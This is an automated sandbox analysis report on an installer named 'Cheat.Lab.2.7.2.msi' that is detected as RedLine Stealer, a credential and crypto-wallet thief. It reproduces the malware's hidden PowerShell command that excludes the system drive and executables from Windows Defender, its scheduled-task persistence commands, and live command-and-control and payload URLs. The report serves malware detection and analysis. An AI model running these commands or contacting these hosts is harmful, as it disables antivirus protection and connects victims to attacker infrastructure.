Windows Analysis Report
Cheat.Lab.2.7.2.msi

Overview

General Information

Sample Name: Cheat.Lab.2.7.2.msi
Analysis ID: 1337697
MD5: 5395845c70fd2495f0407291be32201c
SHA1: a76288fe27b9684ed8d141b50aa55437833ed1a2
SHA256: 338f6a75e6e11459a5cedb3a2917f9b3f9fcb4991fec84514692b649393ea3bb
Tags: msi RedlineStealer

Detection

RedLine
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Drops large PE files
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Suspicious powershell command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
May check the online IP address of the machine
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to detect virtual machines (SLDT)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • msiexec.exe (PID: 7800 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7872 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7920 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F46D88023010FA67F9BE0B7659EC2472 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • LuaJIT.exe (PID: 5524 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua MD5: 9CB9E0D0975E51A90BDED2B3BE8FACA9)
    • msiexec.exe (PID: 8092 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CF599F91F9CA52D79045F3DD2E6AB85B MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8160 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 2387AF9F5B3315EE543DBCEF741FA41F E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIC01A.tmp (PID: 7232 cmdline: C:\Windows\Installer\MSIC01A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat MD5: B9545ED17695A32FACE8C3408A6A3553)
      • cmd.exe (PID: 7356 cmdline: C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7524 cmdline: powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • LuaJIT.exe (PID: 7400 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua MD5: 9CB9E0D0975E51A90BDED2B3BE8FACA9)
    • schtasks.exe (PID: 432 cmdline: schtasks /create /sc daily /st 11:45 /f /tn NotepadUpdateTask_NzEz /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 1160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6052 cmdline: schtasks /create /sc daily /st 11:45 /f /tn "LuaJIT" /tr ""C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • connect.exe (PID: 4584 cmdline: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe MD5: ADF3C225DDD9EEB90009F892A9A83D1B)
      • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • NzEz.exe (PID: 1736 cmdline: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua MD5: 9CB9E0D0975E51A90BDED2B3BE8FACA9)
  • LuaJIT.exe (PID: 4128 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua MD5: 9CB9E0D0975E51A90BDED2B3BE8FACA9)
  • LuaJIT.exe (PID: 6136 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua MD5: 9CB9E0D0975E51A90BDED2B3BE8FACA9)
  • cleanup
{"C2 url": "91.103.252.48:33597", "Bot Id": "c,p", "Authorization Header": "32438af4581b8a75ad1d22d8de993ed9"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000016.00000002.2131526170.000000000040D000.00000004.00000001.01000000.00000008.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000016.00000002.2131675948.0000000000462000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
22.2.connect.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
22.2.connect.exe.460000.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

No Sigma rule has matched

Timestamp: 11/06/23-15:36:09.338589
Source IP: 91.103.252.48
Destination IP: 192.168.2.8
SID: 2046056
Source Port: 33597
Destination Port: 49715
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/06/23-15:36:01.555640
Source IP: 192.168.2.8
Destination IP: 91.103.252.48
SID: 2046045
Source Port: 49715
Destination Port: 33597
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/06/23-15:36:12.584768
Source IP: 192.168.2.8
Destination IP: 91.103.252.48
SID: 2043231
Source Port: 49715
Destination Port: 33597
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/06/23-15:36:01.858290
Source IP: 91.103.252.48
Destination IP: 192.168.2.8
SID: 2043234
Source Port: 33597
Destination Port: 49715
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: 91.103.252.48:33597 | Avira URL Cloud: Label: malware
Source: 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "91.103.252.48:33597", "Bot Id": "c,p", "Authorization Header": "32438af4581b8a75ad1d22d8de993ed9"}
Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIC01A.tmp, 00000006.00000000.1435656250.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIC01A.tmp, 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, 66bc0c.msi.2.dr
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: connect.exe, 00000016.00000002.2145496559.00000000081C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Cheat.Lab.2.7.2.msi, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, MSIACBE.tmp.0.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr, 66bc0c.msi.2.dr, MSIAB91.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: Cheat.Lab.2.7.2.msi, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, MSIACBE.tmp.0.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr, 66bc0c.msi.2.dr, MSIAB91.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIC01A.tmp, 00000006.00000000.1435656250.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIC01A.tmp, 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, 66bc0c.msi.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: Cheat.Lab.2.7.2.msi, MSIBEB1.tmp.2.dr, 66bc0d.rbs.2.dr, MSIBE81.tmp.2.dr, MSIBF2F.tmp.2.dr, 66bc0c.msi.2.dr
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\Installer\MSIC01A.tmp | Code function: 6_2_00F6AF79 FindFirstFileExW,6_2_00F6AF79
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 22_2_02633D10
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then jmp 026334DAh 22_2_026334C2
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then jmp 0815ECDFh 22_2_0815E978
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then inc dword ptr [ebp-20h] 22_2_08157048
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then jmp 0815E243h 22_2_0815DE54
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then jmp 08D92CBFh 22_2_08D92917
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then jmp 08D930B3h 22_2_08D92917
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then jmp 08D97DEDh 22_2_08D97930
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then jmp 08D913ECh 22_2_08D90C90
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then jmp 08D965A7h 22_2_08D9533B
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then jmp 08D919ABh 22_2_08D916D0
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 4x nop then jmp 08D9453Ah 22_2_08D94519

Networking

Source: Traffic | Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.8:49715 -> 91.103.252.48:33597
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.8:49715 -> 91.103.252.48:33597
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 91.103.252.48:33597 -> 192.168.2.8:49715
Source: Traffic | Snort IDS: 2046056 ET TROJAN Redline Stealer Activity (Response) 91.103.252.48:33597 -> 192.168.2.8:49715
Source: Malware configuration extractor | URLs: 91.103.252.48:33597
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: ip-api.com
Source: Joe Sandbox View | ASN Name: HOSTGLOBALPLUS-ASRU HOSTGLOBALPLUS-ASRU
Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
Source: global traffic | TCP traffic: 192.168.2.8:49715 -> 91.103.252.48:33597
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/46122658-3693405117-2476756634-1003s
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/Roaming
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms37
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Msk7y
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Mso8
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmp, LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms8
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Msg
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Msscord
Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34C4000.00000004.00000020.00020000.00000000.sdmp, LuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txty
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmp, LuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/?fields=query
Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.dr | String found in binary or memory: http://ocsp.digicert.com0O
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
